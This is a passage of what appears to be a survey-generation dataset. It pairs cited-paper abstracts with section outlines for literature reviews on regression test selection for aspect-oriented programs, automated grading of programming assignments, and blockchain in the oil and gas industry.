analysis results, we adopt a technique that classifies types of changes and analyze the impact for each type. Primitive changes, changes which are associated with C++ features, are first defined and their ripple effects are computed in order to construct a firewall for each type of change systematically. We have applied our prototype tool to a real system with small size. This case study shows some evidence that our approach gives reasonable efficiency and precision as well as being practical for analyzing change impacts of C++ programs. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Regression test selection for Java software paper_content: Regression testing is applied to modified software to provide confidence that the changed parts behave as intended and that the unchanged parts have not been adversely affected by the modifications. To reduce the cost of regression testing, test cases are selected from the test suite that was used to test the original version of the software---this process is called regression test selection. A safe regression-test-selection algorithm selects every test case in the test suite that may reveal a fault in the modified software. Safe regression-test-selection technique that, based on the use of a suitable representation, handles the features of the Java language. Unlike other safe regression test selection techniques, the presented technique also handles incomplete programs. The technique can thus be safely applied in the (very common) case of Java software that uses external libraries of components; the analysis of the external code is note required for the technique to select test cases for such software. The paper also describes RETEST, a regression-test-selection algorithm can be effective in reducing the size of the test suite. --- paper_title: Scaling regression testing to large software systems paper_content: When software is modified, during development and maintenance, it is regression tested to provide confidence that the changes did not introduce unexpected errors and that new features behave as expected. One important problem in regression testing is how to select a subset of test cases, from the test suite used for the original version of the software, when testing a modified version of the software. Regression-test-selection techniques address this problem. Safe regression-test-selection techniques select every test case in the test suite that may behave differently in the original and modified versions of the software. Among existing safe regression testing techniques, efficient techniques are often too imprecise and achieve little savings in testing effort, whereas precise techniques are too expensive when used on large systems. This paper presents a new regression-test-selection technique for Java programs that is safe, precise, and yet scales to large systems. It also presents a tool that implements the technique and studies performed on a set of subjects ranging from 70 to over 500 KLOC. The studies show that our technique can efficiently reduce the regression testing effort and, thus, achieve considerable savings. --- paper_title: An approach for selective state machine based regression testing paper_content: Model-based regression testing is an important activity that ensures the reliability of evolving software. One of the major issues in this type of testing is the optimal selection of test-cases to test the affected portion of the software. In this paper, we present a UML based selective regression testing strategy that uses state machines and class diagrams for change identification. We identify the changes using the UML 2.1 semantics of state machines and class diagram. The changes are classified as Class-driven (obtained from class diagram) and State-driven (obtained from state machine). The Class-driven changes are important as these changes are not reflected on the state machines and they might be helpful in identifying some fault-revealing test cases. With the help of the identified changes, we classify the test cases of the test suite as Obsolete, Reusable, and Retestable. We apply the approach on a case study to demonstrate its validity. --- paper_title: A Model-Based Regression Testing Approach for Evolving Software Systems with Flexible Tool Support paper_content: Model-based selective regression testing promises reduction in cost and labour by selecting a subset of the test suite corresponding to the modifications after system evolution. However, identification of modifications in the systems and selection of corresponding test cases is challenging due to interdependencies among models. State-based testing is an important approach to test the system behaviour. Unfortunately the existing state-based regression testing approaches do not care for dependencies of the state machines with other system models. This paper presents the tool support and evaluation of our state-based selective regression testing methodology for evolving state-based systems. START is an Eclipse-based tool for state-based regression testing compliant with UML 2.1 semantics. START deals with dependencies of state machines with class diagrams to cater for the change propagation. We applied the START on a case study and our results show significant reduction in the test cases resulting in reduction in testing time and cost. --- paper_title: Using traceability to support model-based regression testing paper_content: Model-driven development is leading to increased use of models in conjunction with source code in software testing. Model-based testing, however, introduces new challenges for testing activities, which include creation and maintenance of traceability information among test-related artifacts. Traceability is required to support activities such as selective regression testing. In fact, most model-based testing automated approaches often concentrate on the test generation and execution activities, while support to other activities is limited (e.g. model-based selective regression testing, coverage analysis and behavioral result evaluation) To address this problem, we propose a solution that uses model transformation to create a traceable infrastructure of test-related artifacts. We use this infrastructure to support model-based selective regression testing. --- paper_title: Specification-Based Approach to Select Regression Test Suite to Validate Changed Software paper_content: Regression testing is used to achieve adequate confidence in changed software. To achieve confidence, currently organizations re-execute the entire system test suite on the entire software. Re-executing entire system test suite is an expensive and time consuming activity. To reduce such costs, execution of smaller regression test suite to validate the changed software is suggested. Several techniques, both code-based and model-based that recommend smaller regression test suites have been proposed in the literature. Largely the model-based regression test selection techniques are based on design models. In this paper, we propose a regression test suite selection approach based on commonly used requirement analysis model -UML use case activity diagram. As a part of the approach we also propose a concept called behavioral slicing to structure activity diagrams. Based on the proposed approach, a prototype tool has been designed and developed. Using the prototype, we have conducted real-world case studies and observed impressive productivity and quality gains. --- paper_title: Regression test selection for Java software paper_content: Regression testing is applied to modified software to provide confidence that the changed parts behave as intended and that the unchanged parts have not been adversely affected by the modifications. To reduce the cost of regression testing, test cases are selected from the test suite that was used to test the original version of the software---this process is called regression test selection. A safe regression-test-selection algorithm selects every test case in the test suite that may reveal a fault in the modified software. Safe regression-test-selection technique that, based on the use of a suitable representation, handles the features of the Java language. Unlike other safe regression test selection techniques, the presented technique also handles incomplete programs. The technique can thus be safely applied in the (very common) case of Java software that uses external libraries of components; the analysis of the external code is note required for the technique to select test cases for such software. The paper also describes RETEST, a regression-test-selection algorithm can be effective in reducing the size of the test suite. --- paper_title: A safe, efficient regression test selection technique paper_content: Regression testing is an expensive but necessary maintenance activity performed on modified software to provide confidence that changes are correct and do not adversely affect other portions of the softwore. A regression test selection technique choses, from an existing test set, thests that are deemed necessary to validate modified software. We present a new technique for regression test selection. Our algorithms construct control flow graphs for a precedure or program and its modified version and use these graphs to select tests that execute changed code from the original test suite. We prove that, under certain conditions, the set of tests our technique selects includes every test from the original test suite that con expose faults in the modified procedfdure or program. Under these conditions our algorithms are safe . Moreover, although our algorithms may select some tests that cannot expose faults, they are at lease as precise as other safe regression test selection algorithms. Unlike many other regression test selection algorithms, our algorithms handle all language constructs and all types of program modifications. We have implemented our algorithms; initial empirical studies indicate that our technique can significantly reduce the cost of regression testing modified software. --- paper_title: A framework and tool supports for generating test inputs of AspectJ programs paper_content: Aspect-oriented software development is gaining popularity with the wider adoption of languages such as AspectJ. To reduce the manual effort of testing aspects in AspectJ programs, we have developed a framework, called Aspectra, that automates generation of test inputs for testing aspectual behavior, i.e., the behavior implemented in pieces of advice or intertype methods defined in aspects. To test aspects, developers construct base classes into which the aspects are woven to form woven classes. Our approach leverages existing test-generation tools to generate test inputs for the woven classes; these test inputs indirectly exercise the aspects. To enable aspects to be exercised during test generation, Aspectra automatically synthesizes appropriate wrapper classes for woven classes. To assess the quality of the generated tests, Aspectra defines and measures aspectual branch coverage (branch coverage within aspects). To provide guidance for developers to improve test coverage, Aspectra also defines interaction coverage. We have developed tools for automating Aspectra's wrapper synthesis and coverage measurement, and applied them on testing 12 subjects taken from a variety of sources. Our experience has shown that Aspectra effectively provides tool supports in enabling existing test-generation tools to generate test inputs for improving aspectual branch coverage. --- paper_title: AutoFlow: An automatic debugging tool for AspectJ software paper_content: Aspect-oriented programming (AOP) is gaining popularity with the wider adoption of languages such as AspectJ. During AspectJ software evolution, when regression tests fail, it may be tedious for programmers to find out the failure-inducing changes by manually inspecting all code editing. To eliminate the expensive effort spent on debugging, we developed AutoFlow, an automatic debugging tool for AspectJ software. AutoFlow integrates the potential of delta debugging algorithm with the benefit of change impact analysis to narrow down the search for faulty changes. It first uses change impact analysis to identify a subset of responsible changes for a failed test, then ranks these changes according to our proposed heuristic (indicating the likelihood that they may have contributed to the failure), and finally employs an improved delta debugging algorithm to determine a minimal set of faulty changes. The main feature of AutoFlow is that it can automatically reduce a large portion of irrelevant changes in an early phase, and then locate faulty changes effectively. ---
Title: A Survey on Regression Test Selection Techniques on Aspect-Oriented Programming Section 1: INTRODUCTION Description 1: Introduce regression testing, its importance, and how it applies to aspect-oriented programming. Section 2: Regression test selection for aspect oriented programs Description 2: Discuss the need for regression testing in aspect-oriented programming and the techniques that are used to perform regression test selection, emphasizing the unique features of aspect-oriented programming. Section 3: RTS Technique for Object Oriented Programs Description 3: Outline various regression test selection techniques used for object-oriented programs, including Firewall Technique, Program Model Based approaches, Extended Control Flow Graph, Partition Based techniques, Design Model Based Technique, and Specification Based Technique. Section 4: RTS Technique for Aspect Oriented Programs Description 4: Detail specific regression test selection techniques for aspect-oriented programs, including the approaches by Rothermal and Harrold, Guoquing Xu, Mark Harman & Tao Xie, and various tools used for aspect-oriented programs. Section 5: Tools for Aspect-Oriented Programs Description 5: Describe the tools available for regression testing in aspect-oriented programming, including ORTS tool, Automatic Debugging tool (AutoFlow), and Celadon tool. Section 6: Conclusion and Future Work Description 6: Summarize the survey findings, discuss the advantages and limitations of the techniques and tools reviewed, and propose directions for future research and improvements in regression test selection techniques for aspect-oriented programming.
Automated Grading Systems for Programming Assignments: A Literature Review
14
--- paper_title: Using testing and JUnit across the curriculum paper_content: While the usage of unit-testing frameworks such as JUnit has greatly increased over the last several years, it is not immediately apparent to students and instructors how to best use tools like JUnit and how to integrate testing across a computer science curriculum. We have worked over the last four semesters to infuse testing and JUnit across our curriculum, building from having students use JUnit to having them write their own test cases to building larger integration and use case testing systems to studying JUnit as an example of good application of design patterns. We have found that, based on this increased presentation and structuring of the usage of JUnit and testing, students have an increased understanding and appreciation of the overall value of testing in software development. --- paper_title: Automated feedback generation for introductory programming assignments paper_content: We present a new method for automatically providing feedback for introductory programming problems. In order to use this method, we need a reference implementation of the assignment, and an error model consisting of potential corrections to errors that students might make. Using this information, the system automatically derives minimal corrections to student's incorrect solutions, providing them with a measure of exactly how incorrect a given solution was, as well as feedback about what they did wrong. We introduce a simple language for describing error models in terms of correction rules, and formally define a rule-directed translation strategy that reduces the problem of finding minimal corrections in an incorrect program to the problem of synthesizing a correct program from a sketch. We have evaluated our system on thousands of real student attempts obtained from the Introduction to Programming course at MIT (6.00) and MITx (6.00x). Our results show that relatively simple error models can correct on average 64% of all incorrect submissions in our benchmark set. --- paper_title: Sketching stencils paper_content: Performance of stencil computations can be significantly improved through smart implementations that improve memory locality, computation reuse, or parallelize the computation. Unfortunately, efficient implementations are hard to obtain because they often involve non-traditional transformations, which means that they cannot be produced by optimizing the reference stencil with a compiler. In fact, many stencils are produced by code generators that were tediously handcrafted. In this paper, we show how stencil implementations can be produced with sketching. Sketching is a software synthesis approach where the programmer develops a partial implementation--a sketch--and a separate specification of the desired functionality given by a reference (unoptimized) stencil. The synthesizer then completes the sketch to behave like the specification, filling in code fragments that are difficult to develop manually. Existing sketching systems work only for small finite programs, i.e.,, programs that can be represented as small Boolean circuits. In this paper, we develop a sketching synthesizer that works for stencil computations, a large class of programs that, unlike circuits, have unbounded inputs and outputs, as well as an unbounded number of computations. The key contribution is a reduction algorithm that turns a stencil into a circuit, allowing us to synthesize stencils using an existing sketching synthesizer. --- paper_title: ConcJUnit: unit testing for concurrent programs paper_content: In test-driven development, tests are written for each program unit before the code is written, ensuring that the code has a comprehensive unit testing harness. Unfortunately, unit testing is much less effective for concurrent programs than for conventional sequential programs, partly because extant unit testing frameworks provide little help in addressing the challenges of testing concurrent code. In this paper, we present ConcJUnit, an extension of the popular unit testing framework JUnit that simplifies the task of writing tests for concurrent programs by handling uncaught exceptions and failed assertions in all threads, and by detecting child threads that were not forced to terminate before the main thread ends. --- paper_title: Programming by sketching for bit-streaming programs paper_content: This paper introduces the concept of programming with sketches, an approach for the rapid development of high-performance applications. This approach allows a programmer to write clean and portable reference code, and then obtain a high-quality implementation by simply sketching the outlines of the desired implementation. Subsequently, a compiler automatically fills in the missing details while also ensuring that a completed sketch is faithful to the input reference code. In this paper, we develop StreamBit as a sketching methodology for the important class of bit-streaming programs (e.g., coding and cryptography).A sketch is a partial specification of the implementation, and as such, it affords several benefits to programmer in terms of productivity and code robustness. First, a sketch is easier to write compared to a complete implementation. Second, sketching allows the programmer to focus on exploiting algorithmic properties rather than on orchestrating low-level details. Third, a sketch-aware compiler rejects "buggy" sketches, thus improving reliability while allowing the programmer to quickly evaluate sophisticated implementation ideas.We evaluated the productivity and performance benefits of our programming methodology in a user-study, where a group of novice StreamBit programmers competed with a group of experienced C programmers on implementing a cipher. We learned that, given the same time budget, the ciphers developed in StreamBit ran 2.5x faster than ciphers coded in C. We also produced implementations of DES and Serpent that were competitive with hand optimized implementations available in the public domain. --- paper_title: Constructing a core literature for computing education research paper_content: After four decades of research on a broad range of topics, computing education has now emerged as a mature research community, with its own journals, conferences, and monographs. Despite this success, the computing education research community still lacks a commonly recognized core literature. A core literature can help a research community to develop a common orientation and make it easier for new researchers to enter the community. This paper proposes an approach to constructing and maintaining a core literature for computing education research. It includes a model for classifying research contributions and a methodology for determining whether they should be included in the core. The model and methodology have been applied to produce an initial list of core papers. An annotated list of these papers is given in appendix A. --- paper_title: Web-CAT: automatically grading programming assignments paper_content: This demonstration introduces participants to using Web-CAT, an open-source automated grading system. Web-CAT is customizable and extensible, allowing it to support a wide variety of programming languages and assessment strategies. Web-CAT is most well-known as the system that "grades students on how well they test their own code," with experimental evidence that it offers greater learning benefits than more traditional output-comparison grading. Participants will learn how to set up courses, prepare reference tests, set up assignments, and allow graders to manually grade for design. --- paper_title: Tool Design and Student Testing Behavior in an Introductory Java Course paper_content: This paper examines the effects of tool design on student testing behavior in an introductory course. Two tools are considered: BlueJ and WebCAT. A small modification was made to the BlueJ test recording interface to encourage students to engage more deeply in the testing process. A larger percentage of tests submitted by students using the modified BlueJ interface were correct. Further, the solutions they submitted contained fewer lines of code while being similarly complete and correct. Evidence is given that students using both BlueJ versions often rely on Web-CAT to validate their solution methods before testing the methods themselves. In response a new Web-CAT grading plug-in is proposed that we believe will better promote an incremental code-a-little test-a-little development style. --- paper_title: Design and Evaluation of Automated Scoring: Java Programming Assignments paper_content: This paper presents a web-based automatic scoring system for Java programming assignments, and reports evaluation results in an actual programming course. The system receives Java application programs submitted by students and returns the test results immediately. The test consists of compiler check, JUnit test, and result test. The result test is very useful for assignments in elementary programming courses, because a typical program is composed of only a main method that reads/writes data from/to the standard input/output devices. The system was used and evaluated in an actual course of our university. The authors confirmed that the system is very helpful for students to improve their programming skills. Especially, many students noticed and corrected their mistakes by repeating submission of their programs again several times. --- paper_title: Grading student programs using ASSYST paper_content: The task of grading solutions to student programming exercises is laborious and error-prone. We have developed a software tool called ASSYST that is designed to relieve a tutor of much of the burden of assessing such programs. ASSYST offers a graphical interface that can be used to direct all aspects of the grading process, and it considers a wide range of criteria in its automatic assessment. Experience with the system has been encouraging. --- paper_title: Practical Programming in TCL & TK paper_content: From the Publisher: ::: "The world's #1 guide to Tcl/Tk has been updated to reflect Tcl/Tk 8.4's powerful improvements in functionality, flexibility, and performance. Brent Welch, Ken Jones, and Jeffrey Hobbs, three of the world's leading Tcl/Tk experts, cover every facet of Tcl/Tk programming, including cross-platform scripting and GUI development, networking, enterprise application integration, and much more." "Coverage includes: systematic explanations and sample code for all Tcl/Tk 8.4 core commands; complete Tk GUI development guidance - perfect for developers working with Perl, Python, or Ruby; insider's insights into Tcl 8.4's key enhancements - VFS layer, internationalized font/character set support, new widgets, and more; definitive coverage of TclHttpd web server (written by its creator); new ways to leverage Tcl/Tk 8.4's major performance improvements; and advanced coverage - threading, Safe Tcl, Tcl script library, regular expressions, and namespaces." Whether you're upgrading to Tcl/Tk 8.4, or building GUIs for applications created with other languages or just searching for a better cross-platform scripting solution, Practical Programming in Tcl and Tk, Fourth Edition delivers all you need to get results. --- paper_title: Semi-Automatic Assessment of Unrestrained Java Code: A Library, a DSL, and a Workbench to Assess Exams and Exercises paper_content: Automated marking of multiple-choice exams is of great interest in university courses with a large number of students. For this reason, it has been systematically implanted in almost all universities. Automatic assessment of source code is however less extended. There are several reasons for that. One reason is that almost all existing systems are based on output comparison with a gold standard. If the output is the expected, the code is correct. Otherwise, it is reported as wrong, even if there is only one typo in the code. Moreover, why it is wrong remains a mystery. In general, assessment tools treat the code as a black box, and they only assess the externally observable behavior. In this work we introduce a new code assessment method that also verifies properties of the code, thus allowing to mark the code even if it is only partially correct. We also report about the use of this system in a real university context, showing that the system automatically assesses around 50% of the work. --- paper_title: Experience using "MOSS" to detect cheating on programming assignments paper_content: Program assignments are traditionally an area of serious concern in maintaining the integrity of the educational process. Systematic inspection of all solutions for possible plagiarism has generally required unrealistic amounts of time and effort. The "Measure Of Software Similarity" tool developed by Alex Aiken at UC Berkeley makes it possible to objectively and automatically check all solutions for evidence of plagiarism. The authors have used MOSS in several large sections of a C programming course (MOSS can also handle a variety of other languages). They feel that MOSS is a major innovation for faculty who teach programming and recommend that it be used routinely to screen for plagiarism. --- paper_title: Web-based grading: further experiences and student attitudes paper_content: This paper describes recent improvements to and experiences with Web-based grading software that has been developed by the author at Ohio University. The software, named WBGP for the web-based grading project, provides facilities to build, test, and annotate student source code with comments concerning programming style and documentation. The software produces a collection of Web-pages for each student project that describes the results of testing, the grading decisions, and the resulting score. The software is able to build student portfolios consisting of all students projects for a given course. In addition, the software is able to generate reports on the type and frequency of grading comments and the correctness of student projects. The paper describes continued experiences in web-based grading of computer science projects at Ohio University. In particular, we describe the various challenges of grading interactive student projects. Finally, this paper describes the results of a student survey concerning the web-based grading software. Students were surveyed concerning the ease of use and understanding of the generated Web-pages, their attitudes towards students portfolios, and their attitudes towards web-based grading. In general, the students responses were positive ---
Title: Automated Grading Systems for Programming Assignments: A Literature Review Section 1: INTRODUCTION Description 1: Discuss the need for automated grading tools in programming assignments, especially in large classes, and provide an overview of the paper's structure. Section 2: SOFTWARE DEFECTS Description 2: Introduce the types of errors targeted by automated grading techniques including syntax errors, logical errors, and runtime errors. Section 3: Unit Testing Description 3: Explain the use and significance of unit testing in automated grading systems, including its implementation and benefits. Section 4: Sketching Synthesis and Error Statistical Modeling (ESM) Description 4: Describe the tool based on sketching synthesis and ESM used for providing instant feedback in programming assignments. Section 5: Peer-To-Peer Feedback Description 5: Discuss the peer-to-peer feedback approach in grading and its advantages and limitations. Section 6: Random Inputs Test Cases Description 6: Describe the use of random inputs to test programming assignments and the limitations of this approach. Section 7: Pattern Matching Description 7: Explain how pattern matching is used to verify the correctness of student assignments and discuss its drawbacks. Section 8: Comparison Description 8: Provide a comparison of the different error detection techniques highlighted in the paper. Section 9: EXISTING SYSTEMS FOR AUTOMATED GRADING Description 9: Review the various existing automated grading systems, categorizing them into automated, semi-automated, and manual grading systems. Section 10: Automated Grading Systems Description 10: Detail specific automated grading systems, how they function, their advantages, and their limitations. Section 11: Semi-Automatic Grading Systems Description 11: Discuss examples of semi-automatic grading systems, their processes, benefits, and challenges. Section 12: Manual Grading Systems Description 12: Present manual grading systems, describing how they incorporate instructor and peer involvement. Section 13: COMPARISON OF EXISTING GRADING SYSTEMS Description 13: Provide a comparative overview of all the existing grading systems discussed in the paper. Section 14: CONCLUSION Description 14: Summarize the findings from the review, highlighting the limitations of current systems and suggesting directions for future work.
Blockchain Technology in the Oil and Gas Industry: A Review of Applications, Opportunities, Challenges, and Risks
7
--- paper_title: Blockchain Authentication of Network Applications: Taxonomy, Classification, Capabilities, Open Challenges, Motivations, Recommendations and Future Directions paper_content: Abstract As the first and last line of defence in many cases, authentication is a crucial part of a system. With authentication, any unauthorised access to the system can be prevented. This work maps the research landscape through two means. The first is a comprehensive taxonomy of blockchain technology in authentication over networking. The second is identification of different types of authentication systems under various platforms that use blockchain technology. This work also provides useful and classified information which can enhance the understanding of how various authentication systems can be combined with blockchain technology. In addition, problems associated with this blockchain technology and proposed solutions are surveyed to fulfil the requirements of the network applications. Moreover, this work highlights the importance, capabilities, motivations and challenges of blockchain technology with distinct applications in various fields. Finally, recommendations and future research directions are discussed. --- paper_title: A survey on security and privacy issues of blockchain technology paper_content: Blockchain is gaining traction and can be termed as one of the furthermost prevalent topics nowadays. Although critics question about its scalability, security, and sustainability, it has already transformed many individuals' lifestyle in some areas due to its inordinate influence on industries and businesses. Granting that the features of blockchain technology guarantee more reliable and expedient services, it is important to consider the security and privacy issues and challenges behind the innovative technology. The spectrum of blockchain applications range from financial, healthcare, automobile, risk management, Internet of things (IoT) to public and social services. Several studies focus on utilizing the blockchain data structure in various applications. However, a comprehensive survey on technical and applications perspective has not yet been accomplished. In this paper, we try to conduct a comprehensive survey on the blockchain technology by discussing its structure to different consensus algorithms as well as the challenges and opportunities from the prospective of security and privacy of data in blockchains. Furthermore, we delve into future trends the blockchain technology can adapt in the years to come. Index Terms- Blockchains, Future Trends of Blockchains, Security, Privacy --- paper_title: A peer-to-peer transaction authentication platform for mobile commerce with semi-offline architecture paper_content: Trusted third-party (TTP) based transaction authentication is traditionally applied to authenticate mobile commerce transactions. However, several issues can arise with this, including seller fraud, TTP performance bottlenecks, and the risk of operations being interrupted. A peer-to-peer mobile commerce transaction authentication platform (MCTAP) with a semi-offline transaction authentication mechanism is proposed in this work. In this, both buyer and seller mutually authenticate and sign the digital receipt for each other. The trusted transaction authentication center thus no longer needs to operate online transaction verification processes, and only has to deal with consumer disputes. MCTAP can raise the efficiency of transaction authentication and provide solutions for the one-way transaction notification systems adopted by most online shopping sites that may encounter seller fraud. The proposed solution is compared to other TTP-based and secure electronic transaction based transaction authentication mechanisms, and the results indicate that the MCTAP has the advantages of efficiency and a higher security level. --- paper_title: An Overview of Blockchain Technology: Architecture, Consensus, and Future Trends paper_content: Blockchain, the foundation of Bitcoin, has received extensive attentions recently. Blockchain serves as an immutable ledger which allows transactions take place in a decentralized manner. Blockchain-based applications are springing up, covering numerous fields including financial services, reputation system and Internet of Things (IoT), and so on. However, there are still many challenges of blockchain technology such as scalability and security problems waiting to be overcome. This paper presents a comprehensive overview on blockchain technology. We provide an overview of blockchain architechture firstly and compare some typical consensus algorithms used in different blockchains. Furthermore, technical challenges and recent advances are briefly listed. We also lay out possible future trends for blockchain. --- paper_title: Conceptualizing Blockchains: Characteristics&Applications paper_content: Blockchain technology has recently gained widespread attention by media, businesses, public sector agencies, and various international organizations, and it is being regarded as potentially even more disruptive than the Internet. Despite significant interest, there is a dearth of academic literature that describes key components of blockchains and discusses potential applications. This paper aims to address this gap. This paper presents an overview of blockchain technology, identifies the blockchain's key functional characteristics, builds a formal definition, and offers a discussion and classification of current and emerging blockchain applications. --- paper_title: Blockchain technology in the chemical industry: Machine-to-machine electricity market paper_content: The purpose of this paper is to explore applications of blockchain technology related to the 4th Industrial Revolution (Industry 4.0) and to present an example where blockchain is employed to facilitate machine-to-machine (M2M) interactions and establish a M2M electricity market in the context of the chemical industry. The presented scenario includes two electricity producers and one electricity consumer trading with each other over a blockchain. All participants are supplied with realistic data produced by process flow sheet models. This work contributes a proof-of-concept implementation of the scenario. Additionally, this paper describes and discusses the research and application landscape of blockchain technology in relation to the Industry 4.0. It concludes that this technology has significant under-researched potential to support and enhance the efficiency gains of the revolution and identifies areas for future research. --- paper_title: Storage Protocol for Securing Blockchain Transparency paper_content: There are several studies that propose identity management that utilizes blockchain technology. In Ethereum, the main programmable blockchain system, data on a blockchain are saved as encoded binaries for executing automatic verification. To decode a binary, users need to know the application binary interfaces (ABI) that describes the data structure of the registered information. However, the manner by which ABI are shared in the current blockchain protocol is opaque. To resolve this problem, we describe a new protocol for embedding the ABI on a blockchain transaction when a registrant registers information. Our method enables users to read registered data with information on the blockchain alone, and it guarantees transparency without requiring users to trust third parties. --- paper_title: Blockchains and Smart Contracts for the Internet of Things paper_content: Motivated by the recent explosion of interest around blockchains, we examine whether they make a good fit for the Internet of Things (IoT) sector. Blockchains allow us to have a distributed peer-to-peer network where non-trusting members can interact with each other without a trusted intermediary, in a verifiable manner. We review how this mechanism works and also look into smart contracts—scripts that reside on the blockchain that allow for the automation of multi-step processes. We then move into the IoT domain, and describe how a blockchain-IoT combination: 1) facilitates the sharing of services and resources leading to the creation of a marketplace of services between devices and 2) allows us to automate in a cryptographically verifiable manner several existing, time-consuming workflows. We also point out certain issues that should be considered before the deployment of a blockchain network in an IoT setting: from transactional privacy to the expected value of the digitized assets traded on the network. Wherever applicable, we identify solutions and workarounds. Our conclusion is that the blockchain-IoT combination is powerful and can cause significant transformations across several industries, paving the way for new business models and novel, distributed applications. --- paper_title: Unlocking Blockchain: Embracing New Technologies to drive Efficiency and Empower the Citizen paper_content: With their innovative and fundamentally liberalising approach to data storage, distributive ledger technologies (DLTs) like blockchain—and other associated technologies offer immense benefits to both the public and private sectors, not least in terms of upping efficiency. Lovers of freedom should also note, however, that they offer an important chance to empower individuals in their necessary engagements with the state, and to rebuild societal trust for the common good. ::: ::: In this paper, we propose the establishment of a UK-based international blockchain competition, and a public-facing **‘Chief Blockchain Officer.’** We also propose a UK **‘blockchain departmental target’**: a long-term aim for government departments to make a 1% efficiency saving by embracing blockchain and other associated innovative technologies. A renewed UK focus on efficiency and the opportunities of new technology would be inspirational, and we look forward to discussing these proposals, and carrying out further research into Distributed Ledger Technologies. --- paper_title: Conceptualizing Blockchains: Characteristics&Applications paper_content: Blockchain technology has recently gained widespread attention by media, businesses, public sector agencies, and various international organizations, and it is being regarded as potentially even more disruptive than the Internet. Despite significant interest, there is a dearth of academic literature that describes key components of blockchains and discusses potential applications. This paper aims to address this gap. This paper presents an overview of blockchain technology, identifies the blockchain's key functional characteristics, builds a formal definition, and offers a discussion and classification of current and emerging blockchain applications. --- paper_title: On the Activity Privacy of Blockchain for IoT paper_content: Blockchain has received tremendous attention as a distributed platform to enhance the security of Internet of Things (IoT). The history of communications is stored in blockchain which introduces auditability. On the flip side, new privacy risks are introduced as the entire history of IoT device communication is exposed to participants. We study the likelihood of classifying IoT devices by analyzing the temporal patterns of their transactions, which to the best of our knowledge, is the first work of its kind. We apply machine learning algorithms on blockchain data to analyze the success rate of device classification. Our results demonstrate success rates over 90% in classifying devices. We propose three timestamp obfuscation methods, namely combining multiple packets into a single transaction, merging ledgers of multiple devices, and randomly delaying transactions, to reduce the success rate in classifying devices which reduce the classification success rates to as low as 24%. --- paper_title: A systematic literature review of blockchain-based applications: Current status, classification and open issues paper_content: Abstract This work provides a systematic literature review of blockchain-based applications across multiple domains. The aim is to investigate the current state of blockchain technology and its applications and to highlight how specific characteristics of this disruptive technology can revolutionise “business-as-usual” practices. To this end, the theoretical underpinnings of numerous research papers published in high ranked scientific journals during the last decade, along with several reports from grey literature as a means of streamlining our assessment and capturing the continuously expanding blockchain domain, are included in this review. Based on a structured, systematic review and thematic content analysis of the discovered literature, we present a comprehensive classification of blockchain-enabled applications across diverse sectors such as supply chain, business, healthcare, IoT, privacy, and data management, and we establish key themes, trends and emerging areas for research. We also point to the shortcomings identified in the relevant literature, particularly limitations the blockchain technology presents and how these limitations spawn across different sectors and industries. Building on these findings, we identify various research gaps and future exploratory directions that are anticipated to be of significant value both for academics and practitioners. --- paper_title: An Overview of Blockchain Technology: Architecture, Consensus, and Future Trends paper_content: Blockchain, the foundation of Bitcoin, has received extensive attentions recently. Blockchain serves as an immutable ledger which allows transactions take place in a decentralized manner. Blockchain-based applications are springing up, covering numerous fields including financial services, reputation system and Internet of Things (IoT), and so on. However, there are still many challenges of blockchain technology such as scalability and security problems waiting to be overcome. This paper presents a comprehensive overview on blockchain technology. We provide an overview of blockchain architechture firstly and compare some typical consensus algorithms used in different blockchains. Furthermore, technical challenges and recent advances are briefly listed. We also lay out possible future trends for blockchain. --- paper_title: Blockchain as a Service for IoT paper_content: A blockchain is a distributed and decentralized ledger that contains connected blocks of transactions. Unlike other ledger approaches, blockchain guarantees tamper proof storage of approved transactions. Due to its distributed and decentralized organization, blockchain is beeing used within IoT e.g. to manage device configuration, store sensor data and enable micro-payments. This paper presents the idea of using blockchain as a service for IoT and evaluates the performance of a cloud and edge hosted blockchain implementation. --- paper_title: An Overview of Blockchain Technology: Architecture, Consensus, and Future Trends paper_content: Blockchain, the foundation of Bitcoin, has received extensive attentions recently. Blockchain serves as an immutable ledger which allows transactions take place in a decentralized manner. Blockchain-based applications are springing up, covering numerous fields including financial services, reputation system and Internet of Things (IoT), and so on. However, there are still many challenges of blockchain technology such as scalability and security problems waiting to be overcome. This paper presents a comprehensive overview on blockchain technology. We provide an overview of blockchain architechture firstly and compare some typical consensus algorithms used in different blockchains. Furthermore, technical challenges and recent advances are briefly listed. We also lay out possible future trends for blockchain. --- paper_title: Blockchain characteristics and consensus in modern business processes paper_content: Abstract Blockchain technology has attracted a great deal of attentions as an effective way to innovate business processes. It has to be integrated with other Business Process Management system (BPM) components to implement specified functionalities related to the applications. The current efforts in integrating this technology into BPM are at a very early stage. To apply Blockchain into business processes efficiently, Blockchain and business process characteristics must be identified. Inconsistency of confirmation settlement that heavily relies on the implementation of consensus protocol poses a major challenge in business process operations, especially ones that are time-critical. In addition, validators, nodes responsible for performing consensus operations in a Blockchain system, can introduce bias and as a result are not trustable. This paper first defines Blockchain and also investigates the characteristics of Blockchain and business processes. Then, we suggest an architecture of business processes in Blockchain era to overcome the problems of time inconsistency and consensus bias. The architecture provides persistency, validity, auditability, and disintermediary that Blockchain offers. The architecture also provides flexibility by allowing business partner to select nodes in performing consensus; thus bias is mitigated. --- paper_title: On the Security and Performance of Proof of Work Blockchains paper_content: Proof of Work (PoW) powered blockchains currently account for more than 90% of the total market capitalization of existing digital cryptocurrencies. Although the security provisions of Bitcoin have been thoroughly analysed, the security guarantees of variant (forked) PoW blockchains (which were instantiated with different parameters) have not received much attention in the literature. This opens the question whether existing security analysis of Bitcoin's PoW applies to other implementations which have been instantiated with different consensus and/or network parameters. In this paper, we introduce a novel quantitative framework to analyse the security and performance implications of various consensus and network parameters of PoW blockchains. Based on our framework, we devise optimal adversarial strategies for double-spending and selfish mining while taking into account real world constraints such as network propagation, different block sizes, block generation intervals, information propagation mechanism, and the impact of eclipse attacks. Our framework therefore allows us to capture existing PoW-based deployments as well as PoW blockchain variants that are instantiated with different parameters, and to objectively compare the tradeoffs between their performance and security provisions. --- paper_title: A Survey about Consensus Algorithms Used in Blockchain paper_content: Thanks to its potential in many applications, Blockchain has recently been nominated as one of the technologies exciting intense attention. Blockchain has solved the problem of changing the original low-trust centralized ledger held by a single third-party, to a high-trust decentralized form held by different entities, or in other words, verifying nodes. The key contribution of the work of Blockchain is the consensus algorithm, which decides how agreement is made to append a new block between all nodes in the verifying network. Blockchain algorithms can be categorized into two main groups. The first group is proof-based consensus, which requires the nodes joining the verifying network to show that they are more qualified than the others to do the appending work. The second group is voting-based consensus, which requires nodes in the network to exchange their results of verifying a new block or 